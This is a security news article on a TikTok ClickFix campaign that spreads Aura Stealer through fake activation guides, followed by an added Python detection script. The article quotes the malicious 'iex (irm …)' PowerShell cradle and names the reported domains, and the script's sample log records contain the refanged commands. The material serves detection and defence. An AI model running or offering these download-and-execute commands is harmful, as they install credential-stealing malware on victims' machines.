Cybercriminals are distributing information-stealing malware through a campaign on TikTok, using videos that falsely claim to be free activation guides for popular software. The ongoing operation, identified on October 19, 2025, uses a social engineering method to trick users into infecting their own computers.
ISC Handler Xavier Mertens reported the campaign, noting its similarities to an operation observed by Trend Micro in May. The TikTok videos purport to offer instructions for activating legitimate software such as Windows, Microsoft 365, Adobe Premiere, Photoshop, CapCut Pro, and Discord Nitro. The campaign also promotes fabricated services, including “Netflix Premium” and “Spotify Premium,” to lure a wider audience.
The attack technique is known as a ClickFix attack, which involves providing seemingly helpful instructions that deceive users into running malicious commands. The videos display a short, one-line PowerShell command and instruct viewers to execute it with administrator privileges. An example command shown is “iex (irm slmgr[.]win/photoshop)”, where irm (Invoke-RestMethod) fetches the remote content and iex (Invoke-Expression) runs it. The specific program name within the URL, such as “photoshop,” is altered to match the software being impersonated in the video.
When a user executes this command, PowerShell connects to the remote site slmgr[.]win. This action retrieves and runs a second PowerShell script, which then downloads two executable files from Cloudflare Pages. The first file, downloaded from https://file-epq[.]pages[.]dev/updater.exe, is a variant of the Aura Stealer malware. Aura Stealer is designed to harvest saved credentials from web browsers, authentication cookies, cryptocurrency wallets, and login data from other applications. This stolen information is then uploaded to the attackers, granting them access to the victim’s accounts.
A second payload, named source.exe, is also downloaded. This executable is used to self-compile code using the .NET framework’s built-in Visual C# Compiler (csc.exe). The compiled code is subsequently injected and launched directly in memory. The specific purpose of this second payload has not yet been determined.
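The following is an added detection example, not code from the ISC report or the campaign itself: it flags PowerShell command lines that match the “iex (irm …)” download cradle described above (and its long-form and DownloadString equivalents) and checks them against the two domains the report names. The event records, the field names and the heuristic patterns are constructed assumptions for illustration.

```python
import re

# Heuristics for the ClickFix PowerShell download cradle: an Invoke-Expression
# (alias iex) wrapped around Invoke-RestMethod (irm) or Invoke-WebRequest (iwr).
# Patterns are assumptions; tune against real telemetry before deployment.
CRADLE_RE = re.compile(
    r"\b(?:iex|invoke-expression)\b\s*\(?\s*"
    r"(?:irm|invoke-restmethod|iwr|invoke-webrequest)\b",
    re.IGNORECASE,
)
# Older form of the same cradle: .DownloadString(...) piped into iex
DOWNLOAD_STRING_RE = re.compile(
    r"downloadstring\s*\(.*\)\s*\|\s*(?:iex|invoke-expression)\b", re.IGNORECASE
)
# Domains named in the report (refanged for matching); "slmgr" mimics the
# legitimate Windows licensing tool slmgr.vbs to look like an activation step.
REPORTED_DOMAINS = ("slmgr.win", "file-epq.pages.dev")


def classify(command_line: str) -> list[str]:
    """Return the detection reasons that apply to one PowerShell command line."""
    reasons = []
    if CRADLE_RE.search(command_line) or DOWNLOAD_STRING_RE.search(command_line):
        reasons.append("remote-download-cradle")
    lowered = command_line.lower()
    if any(domain in lowered for domain in REPORTED_DOMAINS):
        reasons.append("known-clickfix-domain")
    return reasons


# Constructed sample records shaped like PowerShell script-block log entries
SAMPLE_EVENTS = [
    {"host": "ws01", "user": "alice", "script": "iex (irm slmgr.win/photoshop)"},
    {"host": "ws02", "user": "bob",
     "script": "Invoke-Expression (Invoke-RestMethod 'http://slmgr.win/windows')"},
    {"host": "ws03", "user": "carol", "script": "Get-ChildItem C:\\Users | Sort-Object Length"},
    {"host": "ws04", "user": "dave",
     "script": "(New-Object Net.WebClient).DownloadString('http://file-epq.pages.dev/a') | iex"},
]


def scan(events):
    """Return (host, user, reasons) for every event that trips at least one heuristic."""
    hits = []
    for event in events:
        reasons = classify(event["script"])
        if reasons:
            hits.append((event["host"], event["user"], reasons))
    return hits


if __name__ == "__main__":
    for host, user, reasons in scan(SAMPLE_EVENTS):
        print(f"{host} {user}: {', '.join(reasons)}")
```

Any hit on the cradle pattern is worth triage even without a known domain, since the URL path and hostname change between videos while the iex/irm shape does not.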
Users who have followed the instructions in these videos should consider all of their credentials compromised and are advised to immediately reset passwords for all websites and online services they use.
ClickFix attacks have become significantly more common over the past year. They are used to distribute various malware strains in campaigns related to ransomware and cryptocurrency theft. As a general security practice, users should never copy text from a website and execute it in an operating system dialog box, including the File Explorer address bar, command prompt, PowerShell, macOS terminal, or Linux shells.